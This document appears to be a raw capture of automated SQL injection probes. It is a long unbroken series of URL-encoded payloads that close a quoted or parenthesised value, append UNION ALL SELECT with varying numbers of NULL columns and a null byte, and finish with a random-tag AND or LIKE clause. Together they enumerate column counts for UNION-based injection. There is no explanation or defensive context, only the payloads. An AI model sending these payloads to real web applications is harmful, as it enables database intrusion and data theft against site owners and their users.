1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27HvJa%27%20LIKE%20%27HvJa 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27SPCv%27%20LIKE%20%27SPCv 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27BVXi%27%20LIKE%20%27BVXi 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27CQMm%27%20LIKE%20%27CQMm 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22mNnc%22%3D%22mNnc 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22gAaO%22%3D%22gAaO 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22IMIP%22%3D%22IMIP 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22eFiq%22%3D%22eFiq 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22ZYjJ%22%3D%22ZYjJ 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22NcHZ%22%3D%22NcHZ 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22YjBd%22%3D%22YjBd 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22gwyv%22%3D%22gwyv 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22bfNh%22%3D%22bfNh 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22WgOX%22%3D%22WgOX 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22rLGz%22%3D%22rLGz 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22ybtR%22%3D%22ybtR 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22xYgB%22%3D%22xYgB 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22NAGm%22%3D%22NAGm 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22yGyx%22%3D%22yGyx 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22tYVg%22%3D%22tYVg 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22mWsi%22%3D%22mWsi 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22dxHI%22%3D%22dxHI 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22RppM%22%3D%22RppM 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22ZdiF%22%3D%22ZdiF 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22qdWW%22%3D%22qdWW 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22kwei%22%3D%22kwei 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22pcVk%22%3D%22pcVk 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22ajuT%22%3D%22ajuT 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22eJih%22%3D%22eJih 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22JWLe%22%3D%22JWLe 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22OjuU%22%3D%22OjuU 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22HKab%22%3D%22HKab 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22kwcF%22%3D%22kwcF 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22Bqop%22%3D%22Bqop 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22jieE%22%3D%22jieE 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22yUrn%22%3D%22yUrn 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22Cvaw%22%3D%22Cvaw 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22nzjB%22%3D%22nzjB 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22dOjK%22%3D%22dOjK 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22zjFw%22%3D%22zjFw 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22RvQy%22%3D%22RvQy 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22OUGg%22%3D%22OUGg 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22WQfZ%22%3D%22WQfZ 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22nvEv%22%3D%22nvEv 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22hgiQ%22%20LIKE%20%22hgiQ 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22QzlC%22%20LIKE%20%22QzlC 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22aUHu%22%20LIKE%20%22aUHu 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22PtcD%22%20LIKE%20%22PtcD 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22pRdi%22%20LIKE%20%22pRdi 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22ZejD%22%20LIKE%20%22ZejD 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22WPit%22%20LIKE%20%22WPit 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22otYK%22%20LIKE%20%22otYK 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22AtpO%22%20LIKE%20%22AtpO 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22eHEN%22%20LIKE%20%22eHEN 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22kAvH%22%20LIKE%20%22kAvH 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22STMU%22%20LIKE%20%22STMU 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22TjWe%22%20LIKE%20%22TjWe 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22RiND%22%20LIKE%20%22RiND 